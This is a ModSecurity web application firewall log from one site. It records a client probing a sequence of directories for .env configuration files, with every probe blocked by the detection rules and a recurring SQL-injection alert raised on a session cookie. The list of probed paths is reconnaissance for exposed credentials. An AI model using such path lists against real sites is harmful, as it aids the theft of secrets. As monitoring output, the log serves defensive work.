[Mon May 11 16:33:44.040369 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/vite/.env"] [unique_id "agHoyFV4kyjgo4bQBUhXxQAAAM0"]
[Mon May 11 16:33:44.040625 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/vite/.env"] [unique_id "agHoyFV4kyjgo4bQBUhXxQAAAM0"]
[Mon May 11 16:33:44.203505 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backup/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/backup/.env"] [unique_id "agHoyFV4kyjgo4bQBUhXxgAAAM0"]
[Mon May 11 16:33:44.203842 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/backup/.env"] [unique_id "agHoyFV4kyjgo4bQBUhXxgAAAM0"]
[Mon May 11 16:33:44.204009 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/backup/.env"] [unique_id "agHoyFV4kyjgo4bQBUhXxgAAAM0"]
[Mon May 11 16:33:44.204239 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/backup/.env"] [unique_id "agHoyFV4kyjgo4bQBUhXxgAAAM0"]
[Mon May 11 16:33:44.367042 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backups/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/backups/.env"] [unique_id "agHoyFV4kyjgo4bQBUhXxwAAAM0"]
[Mon May 11 16:33:44.367473 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/backups/.env"] [unique_id "agHoyFV4kyjgo4bQBUhXxwAAAM0"]
[Mon May 11 16:33:44.367659 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/backups/.env"] [unique_id "agHoyFV4kyjgo4bQBUhXxwAAAM0"]
[Mon May 11 16:33:44.367895 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/backups/.env"] [unique_id "agHoyFV4kyjgo4bQBUhXxwAAAM0"]
[Mon May 11 16:33:44.530835 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /old/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/old/.env"] [unique_id "agHoyFV4kyjgo4bQBUhXyAAAAM0"]
[Mon May 11 16:33:44.531219 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/old/.env"] [unique_id "agHoyFV4kyjgo4bQBUhXyAAAAM0"]
[Mon May 11 16:33:44.531405 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/old/.env"] [unique_id "agHoyFV4kyjgo4bQBUhXyAAAAM0"]
[Mon May 11 16:33:44.531656 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/old/.env"] [unique_id "agHoyFV4kyjgo4bQBUhXyAAAAM0"]
[Mon May 11 16:33:44.694708 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tmp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/tmp/.env"] [unique_id "agHoyFV4kyjgo4bQBUhXyQAAAM0"]
[Mon May 11 16:33:44.695085 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/tmp/.env"] [unique_id "agHoyFV4kyjgo4bQBUhXyQAAAM0"]
[Mon May 11 16:33:44.695289 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/tmp/.env"] [unique_id "agHoyFV4kyjgo4bQBUhXyQAAAM0"]
[Mon May 11 16:33:44.695547 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/tmp/.env"] [unique_id "agHoyFV4kyjgo4bQBUhXyQAAAM0"]
[Mon May 11 16:33:44.858594 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /temp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/temp/.env"] [unique_id "agHoyFV4kyjgo4bQBUhXygAAAM0"]
[Mon May 11 16:33:44.858976 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/temp/.env"] [unique_id "agHoyFV4kyjgo4bQBUhXygAAAM0"]
[Mon May 11 16:33:44.859171 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/temp/.env"] [unique_id "agHoyFV4kyjgo4bQBUhXygAAAM0"]
[Mon May 11 16:33:44.859407 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/temp/.env"] [unique_id "agHoyFV4kyjgo4bQBUhXygAAAM0"]
[Mon May 11 16:33:45.023580 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/lab/.env"] [unique_id "agHoyVV4kyjgo4bQBUhXywAAAM0"]
[Mon May 11 16:33:45.023958 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/lab/.env"] [unique_id "agHoyVV4kyjgo4bQBUhXywAAAM0"]
[Mon May 11 16:33:45.024149 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/lab/.env"] [unique_id "agHoyVV4kyjgo4bQBUhXywAAAM0"]
[Mon May 11 16:33:45.024416 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/lab/.env"] [unique_id "agHoyVV4kyjgo4bQBUhXywAAAM0"]
[Mon May 11 16:33:45.187903 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/cronlab/.env"] [unique_id "agHoyVV4kyjgo4bQBUhXzQAAAM0"]
[Mon May 11 16:33:45.188299 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/cronlab/.env"] [unique_id "agHoyVV4kyjgo4bQBUhXzQAAAM0"]
[Mon May 11 16:33:45.188487 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/cronlab/.env"] [unique_id "agHoyVV4kyjgo4bQBUhXzQAAAM0"]
[Mon May 11 16:33:45.188721 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/cronlab/.env"] [unique_id "agHoyVV4kyjgo4bQBUhXzQAAAM0"]
[Mon May 11 16:33:45.351791 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/cron/.env"] [unique_id "agHoyVV4kyjgo4bQBUhXzgAAAM0"]
[Mon May 11 16:33:45.352165 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/cron/.env"] [unique_id "agHoyVV4kyjgo4bQBUhXzgAAAM0"]
[Mon May 11 16:33:45.352350 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/cron/.env"] [unique_id "agHoyVV4kyjgo4bQBUhXzgAAAM0"]
[Mon May 11 16:33:45.352584 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/cron/.env"] [unique_id "agHoyVV4kyjgo4bQBUhXzgAAAM0"]
[Mon May 11 16:33:45.516171 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/en/.env"] [unique_id "agHoyVV4kyjgo4bQBUhXzwAAAM0"]
[Mon May 11 16:33:45.516553 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/en/.env"] [unique_id "agHoyVV4kyjgo4bQBUhXzwAAAM0"]
